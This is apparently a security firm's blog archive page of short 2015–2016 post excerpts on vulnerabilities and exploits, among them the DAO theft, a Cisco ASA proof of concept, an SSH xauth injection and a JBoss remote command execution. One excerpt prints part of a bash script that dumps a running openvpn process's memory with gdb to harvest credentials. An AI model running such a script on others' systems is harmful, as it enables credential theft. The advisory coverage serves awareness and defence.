Metasploit
  • June 21, 2016

    Cryptocurrency and Smart-Contracts security fail: the Ethereum $59 Million hack

    Ethers is a cryptocurrency designed to power smart-contracts, autonomous programs that define how an amount of money will behave. A simple race condition in the code of a very large smart-contract allowed an attacker to steal $59 million of value from the DAO account: Bitcoin’s Largest Competitor Hacked: Over $59 Million “Ethers” Stolen In Ongoing Attack. Details here […]

  • June 16, 2016

    Security nightmares are going Low-Level

    Java and Flash have been and still are terrible 3rd party components when it comes to the security of our PCs. While from a functional point of view they were rocket science in the ’90s (anybody who remembers ActiveX would agree), nowadays they are sluggish, weakly integrated rectangles in our web pages. Finally both Oracle and Adobe […]

  • May 18, 2016

    Cisco ASA Exploit Released!

    In February 2016 we sent an Early Warning to our customers for a remote code execution (RCE) in Cisco ASA (CVE-2016-1287 or cisco-sa-20160210-asa-ike). Today a POC has been published: https://github.com/exodusintel/disclosures/blob/master/CVE_2016_1287_PoC You can find more details at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1287 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160210-asa-ike https://blog.exodusintel.com/2016/02/10/firewall-hacking/

  • March 14, 2016

    Time to supercharge your restricted SSH accounts!

    Time to hack restricted SSH accounts thanks to an injection in the “xauth” command! Not an exploit for everyone but CVE-2016-3115 and CVE-2016-3116 details have just been published on Full Disclosure, and they will be useful to a lot of people for sure :) If your remote provider gives you a restricted SSH access using a forced-command […]

  • November 20, 2015

    JSF ViewState upside-down

    Renaud Dubourguais and Nicolas Collignon released a nice paper on Java Server Faces security titled JSF ViewState upside-down (http://www.synacktiv.fr/ressources/JSF_ViewState_InYourFace.pdf). JSF implementations are often used in J2EE applications. JSF uses ViewStates, which have already been discussed for cryptographic weaknesses such as the padding oracle attack [PADDING]. ViewStates have also been abused to create client-side attacks […]

  • October 25, 2015

    Grab credentials from a running openvpn process in Linux

    #!/bin/bash
    # This little hack-job will grab credentials from a running openvpn process in Linux
    # Keep in mind this won't work if the user used the --auth-nocache flag
    grep rw-p /proc/$1/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; […]

  • October 9, 2015

    Fishing the AWS IP Pool for Dangling Domains

    Fishing the AWS IP Pool for Dangling Domains: Amazon and other cloud providers have made it child’s play to spin up ephemeral server instances for quick deployment of various services. If you want a web server to host your new .io domain name, you can have it set up in no time at all. Starting a website […]

  • October 9, 2015

    Netgear R6200 wireless router pwnage

    http://shadow-file.blogspot.it/2015/04/broken-abandoned-and-forgotten-code_22.html
    http://shadow-file.blogspot.it/2015/04/abandoned-part-01.html
    http://shadow-file.blogspot.it/2015/04/abandoned-part-02.html
    http://shadow-file.blogspot.it/2015/05/abandoned-part-03.html
    http://shadow-file.blogspot.it/2015/05/abandoned-part-04.html
    http://shadow-file.blogspot.it/2015/05/abandoned-part-05.html
    http://shadow-file.blogspot.it/2015/05/abandoned-part-06.html
    http://shadow-file.blogspot.it/2015/06/abandoned-part-07.html
    http://shadow-file.blogspot.it/2015/06/abandoned-part-08.html
    http://shadow-file.blogspot.it/2015/06/abandoned-part-09.html
    http://shadow-file.blogspot.it/2015/07/abandoned-part-10.html
    http://shadow-file.blogspot.it/2015/07/abandoned-part-11.html
    http://shadow-file.blogspot.it/2015/09/abandoned-part-12.html
    http://shadow-file.blogspot.it/2015/10/abandoned-part-13.html
    There is even a GitHub repository for the project!

  • March 31, 2015

    Stack overflow in libtasn1

    Stack overflow in libtasn1: libtasn1 is a library to parse ASN.1 data structures. Its most prominent user is GnuTLS. Fuzzing libtasn1 led to the discovery of a stack write overflow in the function _asn1_ltostr (file parser_aux.c). It overflows a temporary buffer variable on certain inputs. This issue has been reported to the developers on 2015-03-26. A fix was released […]

  • March 31, 2015

    JBoss JMXInvokerServlet Remote Command Execution

    JBoss JMXInvokerServlet Remote Command Execution: This code exploits a common misconfiguration in JBoss Application Server. Whenever the JMX Invoker is exposed with the default configuration, a malicious “MarshalledInvocation” serialized Java object allows arbitrary code execution. This exploit works even if the “Web-Console” and the “JMX Console” are protected or disabled.

Copyright © 2023 by ISGroup SRL - All Rights Reserved -